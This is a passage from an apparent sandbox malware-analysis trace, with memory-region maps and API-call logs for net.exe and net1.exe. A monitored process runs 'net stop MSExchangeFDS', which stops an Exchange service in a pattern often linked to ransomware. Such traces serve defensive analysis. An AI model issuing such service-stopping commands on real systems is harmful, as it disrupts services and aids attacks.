0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10005 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10006 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10007 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10008 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10009 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 614 os_tid = 0xe94 Thread: id = 615 os_tid = 0xed0 Thread: id = 616 os_tid = 0xeb0 Process: id = "199" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x11614000" os_pid = "0xed4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "197" os_parent_pid = "0xe84" cmd_line = "net stop MSExchangeFDS" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10023 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 10024 start_va = 0x7d0000 end_va = 0x47cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 10025 start_va = 0x47d0000 end_va = 0x47effff entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 10026 start_va = 0x47f0000 end_va = 0x47f1fff entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 10027 start_va = 0x4800000 end_va = 0x4813fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004800000" filename = "" Region: id = 10028 start_va = 0x4820000 end_va = 0x485ffff entry_point = 0x0 region_type = private name = "private_0x0000000004820000" filename = "" Region: id = 10029 start_va = 0x4860000 end_va = 0x48dffff entry_point = 0x0 region_type = private name = "private_0x0000000004860000" filename = "" Region: id = 10030 start_va = 0x48e0000 end_va = 0x48e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048e0000" filename = "" Region: id = 10031 start_va = 0x48f0000 end_va = 0x48f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048f0000" filename = "" Region: id = 10032 start_va = 0x4900000 end_va = 0x4901fff entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 10033 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10034 start_va = 0x7ebc0000 end_va = 0x7ebe2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ebc0000" filename = "" Region: id = 10035 start_va = 0x7ebe7000 end_va = 0x7ebe7fff entry_point = 0x0 region_type = private name = "private_0x000000007ebe7000" filename = "" Region: id = 10036 start_va = 0x7ebeb000 end_va = 0x7ebedfff entry_point = 0x0 region_type = private name = "private_0x000000007ebeb000" filename = "" Region: id = 10037 start_va = 0x7ebee000 end_va = 0x7ebeefff entry_point = 0x0 region_type = private name = "private_0x000000007ebee000" filename = "" Region: id = 10038 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10039 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10040 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10041 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10042 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10043 start_va = 0x4a00000 end_va = 0x4a0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 10044 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10045 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10046 start_va = 0x4a30000 end_va = 0x4b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 10047 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 618 os_tid = 0xec4 Thread: id = 619 os_tid = 0xedc Process: id = "200" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x10cb8000" os_pid = "0xed8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "199" os_parent_pid = "0xed4" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeFDS" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10048 start_va = 0x5f0000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 10049 start_va = 0x610000 end_va = 0x611fff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10050 start_va = 0x620000 end_va = 0x633fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 10051 start_va = 0x640000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 10052 start_va = 0x680000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 10053 start_va = 0x700000 end_va = 0x703fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 10054 start_va = 0x710000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 10055 start_va = 0x720000 end_va = 0x721fff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 10056 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 10057 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 10058 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10059 start_va = 0x7f920000 end_va = 0x7f942fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f920000" filename = "" Region: id = 10060 start_va = 0x7f943000 end_va = 0x7f943fff entry_point = 0x0 region_type = private name = "private_0x000000007f943000" filename = "" Region: id = 10061 start_va = 0x7f94b000 end_va = 0x7f94bfff entry_point = 0x0 region_type = private name = "private_0x000000007f94b000" filename = "" Region: id = 10062 start_va = 0x7f94d000 end_va = 0x7f94ffff entry_point = 0x0 region_type = private name = "private_0x000000007f94d000" filename = "" Region: id = 10063 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10064 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10065 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10066 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10067 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10068 start_va = 0x7e0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 10069 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10070 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10071 start_va = 0x800000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 10072 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10073 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 10074 start_va = 0x600000 end_va = 0x603fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 10075 start_va = 0x730000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 10076 start_va = 0x900000 end_va = 0x9bdfff entry_point = 0x900000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10077 start_va = 0x9c0000 end_va = 0xa3ffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 10078 start_va = 0xb50000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 10079 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 10080 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 10081 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 10082 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 10083 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 10084 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 10085 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 10086 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 10087 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10088 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10089 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10090 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10091 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10092 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10093 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10094 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10095 start_va = 0x7f820000 end_va = 0x7f91ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f820000" filename = "" Region: id = 10096 start_va = 0x7f948000 end_va = 0x7f94afff entry_point = 0x0 region_type = private name = "private_0x000000007f948000" filename = "" Region: id = 10097 start_va = 0x610000 end_va = 0x613fff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10098 start_va = 0x770000 end_va = 0x772fff entry_point = 0x770000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 10099 start_va = 0x780000 end_va = 0x7b1fff entry_point = 0x780000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 620 os_tid = 0xebc [0136.008] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0136.008] __set_app_type (_Type=0x1) [0136.008] __p__fmode () returned 0x77ac4d6c [0136.008] __p__commode () returned 0x77ac5b1c [0136.008] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0136.008] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0136.008] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.008] GetConsoleOutputCP () returned 0x1b5 [0136.009] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0136.009] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.011] sprintf_s (in: _DstBuf=0x6ff9cc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0136.011] setlocale (category=0, locale=".437") returned="English_United States.437" [0136.012] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0136.012] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0136.012] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeFDS" [0136.012] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6ff774, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0136.012] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x6ff768 | out: Buffer=0x6ff768*=0x808150) returned 0x0 [0136.012] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x6ff76c | out: Buffer=0x6ff76c*=0x808120) returned 0x0 [0136.012] __iob_func () returned 0x77ac1208 [0136.013] _fileno (_File=0x77ac1208) returned 0 [0136.013] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0136.013] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0136.013] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0136.013] _wcsicmp (_String1="config", _String2="stop") returned -16 [0136.013] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0136.013] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0136.013] _wcsicmp (_String1="file", _String2="stop") returned -13 [0136.013] _wcsicmp (_String1="files", _String2="stop") returned -13 [0136.013] _wcsicmp (_String1="group", _String2="stop") returned -12 [0136.013] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0136.013] _wcsicmp (_String1="help", _String2="stop") returned -11 [0136.013] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0136.013] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0136.013] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0136.013] _wcsicmp (_String1="session", _String2="stop") returned -15 [0136.013] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0136.013] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0136.013] _wcsicmp (_String1="share", _String2="stop") returned -12 [0136.013] _wcsicmp (_String1="start", _String2="stop") returned -14 [0136.013] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0136.013] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0136.013] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0136.013] _wcsicmp (_String1="accounts", _String2="MSExchangeFDS") returned -12 [0136.013] _wcsicmp (_String1="computer", _String2="MSExchangeFDS") returned -10 [0136.013] _wcsicmp (_String1="config", _String2="MSExchangeFDS") returned -10 [0136.013] _wcsicmp (_String1="continue", _String2="MSExchangeFDS") returned -10 [0136.013] _wcsicmp (_String1="cont", _String2="MSExchangeFDS") returned -10 [0136.013] _wcsicmp (_String1="file", _String2="MSExchangeFDS") returned -7 [0136.013] _wcsicmp (_String1="files", _String2="MSExchangeFDS") returned -7 [0136.013] _wcsicmp (_String1="group", _String2="MSExchangeFDS") returned -6 [0136.013] _wcsicmp (_String1="groups", _String2="MSExchangeFDS") returned -6 [0136.013] _wcsicmp (_String1="help", _String2="MSExchangeFDS") returned -5 [0136.013] _wcsicmp (_String1="helpmsg", _String2="MSExchangeFDS") returned -5 [0136.013] _wcsicmp (_String1="localgroup", _String2="MSExchangeFDS") returned -1 [0136.014] _wcsicmp (_String1="pause", _String2="MSExchangeFDS") returned 3 [0136.014] _wcsicmp (_String1="session", _String2="MSExchangeFDS") returned 6 [0136.014] _wcsicmp (_String1="sessions", _String2="MSExchangeFDS") returned 6 [0136.014] _wcsicmp (_String1="sess", _String2="MSExchangeFDS") returned 6 [0136.014] _wcsicmp (_String1="share", _String2="MSExchangeFDS") returned 6 [0136.014] _wcsicmp (_String1="start", _String2="MSExchangeFDS") returned 6 [0136.014] _wcsicmp (_String1="stats", _String2="MSExchangeFDS") returned 6 [0136.014] _wcsicmp (_String1="statistics", _String2="MSExchangeFDS") returned 6 [0136.014] _wcsicmp (_String1="stop", _String2="MSExchangeFDS") returned 6 [0136.014] _wcsicmp (_String1="time", _String2="MSExchangeFDS") returned 7 [0136.014] _wcsicmp (_String1="user", _String2="MSExchangeFDS") returned 8 [0136.014] _wcsicmp (_String1="users", _String2="MSExchangeFDS") returned 8 [0136.014] _wcsicmp (_String1="msg", _String2="MSExchangeFDS") returned 2 [0136.014] _wcsicmp (_String1="messenger", _String2="MSExchangeFDS") returned -14 [0136.014] _wcsicmp (_String1="receiver", _String2="MSExchangeFDS") returned 5 [0136.014] _wcsicmp (_String1="rcv", _String2="MSExchangeFDS") returned 5 [0136.014] _wcsicmp (_String1="netpopup", _String2="MSExchangeFDS") returned 1 [0136.014] _wcsicmp (_String1="redirector", _String2="MSExchangeFDS") returned 5 [0136.014] _wcsicmp (_String1="redir", _String2="MSExchangeFDS") returned 5 [0136.014] _wcsicmp (_String1="rdr", _String2="MSExchangeFDS") returned 5 [0136.014] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeFDS") returned 10 [0136.014] _wcsicmp (_String1="work", _String2="MSExchangeFDS") returned 10 [0136.014] _wcsicmp (_String1="wksta", _String2="MSExchangeFDS") returned 10 [0136.014] _wcsicmp (_String1="prdr", _String2="MSExchangeFDS") returned 3 [0136.014] _wcsicmp (_String1="devrdr", _String2="MSExchangeFDS") returned -9 [0136.014] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeFDS") returned -1 [0136.014] _wcsicmp (_String1="server", _String2="MSExchangeFDS") returned 6 [0136.014] _wcsicmp (_String1="svr", _String2="MSExchangeFDS") returned 6 [0136.014] _wcsicmp (_String1="srv", _String2="MSExchangeFDS") returned 6 [0136.014] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeFDS") returned -1 [0136.014] _wcsicmp (_String1="alerter", _String2="MSExchangeFDS") returned -12 [0136.014] _wcsicmp (_String1="netlogon", _String2="MSExchangeFDS") returned 1 [0136.014] _wcsupr (in: _String="MSExchangeFDS" | out: _String="MSEXCHANGEFDS") returned="MSEXCHANGEFDS" [0136.014] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x803438 [0136.016] GetServiceKeyNameW (in: hSCManager=0x803438, lpDisplayName="MSEXCHANGEFDS", lpServiceName=0x10a8cb0, lpcchBuffer=0x6ff6e4 | out: lpServiceName="", lpcchBuffer=0x6ff6e4) returned 0 [0136.017] _wcsicmp (_String1="msg", _String2="MSEXCHANGEFDS") returned 2 [0136.017] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEFDS") returned -14 [0136.017] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEFDS") returned 5 [0136.017] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEFDS") returned 5 [0136.017] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEFDS") returned 5 [0136.017] _wcsicmp (_String1="redir", _String2="MSEXCHANGEFDS") returned 5 [0136.017] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEFDS") returned 5 [0136.017] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEFDS") returned 10 [0136.017] _wcsicmp (_String1="work", _String2="MSEXCHANGEFDS") returned 10 [0136.017] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEFDS") returned 10 [0136.017] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEFDS") returned 3 [0136.017] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEFDS") returned -9 [0136.017] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEFDS") returned -1 [0136.017] _wcsicmp (_String1="server", _String2="MSEXCHANGEFDS") returned 6 [0136.017] _wcsicmp (_String1="svr", _String2="MSEXCHANGEFDS") returned 6 [0136.017] _wcsicmp (_String1="srv", _String2="MSEXCHANGEFDS") returned 6 [0136.017] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEFDS") returned -1 [0136.017] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEFDS") returned -12 [0136.017] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEFDS") returned 1 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="WORKSTATION") returned -10 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="LanmanWorkstation") returned 1 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="SERVER") returned -6 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="LanmanServer") returned 1 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="BROWSER") returned 11 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="BROWSER") returned 11 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="MESSENGER") returned 14 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="MESSENGER") returned 14 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="NETRUN") returned -1 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="NETRUN") returned -1 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="SPOOLER") returned -6 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="SPOOLER") returned -6 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="ALERTER") returned 12 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="ALERTER") returned 12 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="NETLOGON") returned -1 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="NETLOGON") returned -1 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="NETPOPUP") returned -1 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="NETPOPUP") returned -1 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="SQLSERVER") returned -6 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="SQLSERVER") returned -6 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="REPLICATOR") returned -5 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="REPLICATOR") returned -5 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="REMOTEBOOT") returned -5 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="REMOTEBOOT") returned -5 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="TIMESOURCE") returned -7 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="TIMESOURCE") returned -7 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="AFP") returned 12 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="AFP") returned 12 [0136.017] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="UPS") returned -8 [0136.018] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="UPS") returned -8 [0136.018] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="XACTSRV") returned -11 [0136.018] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="XACTSRV") returned -11 [0136.018] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="TCPIP") returned -7 [0136.018] _wcsicmp (_String1="MSEXCHANGEFDS", _String2="TCPIP") returned -7 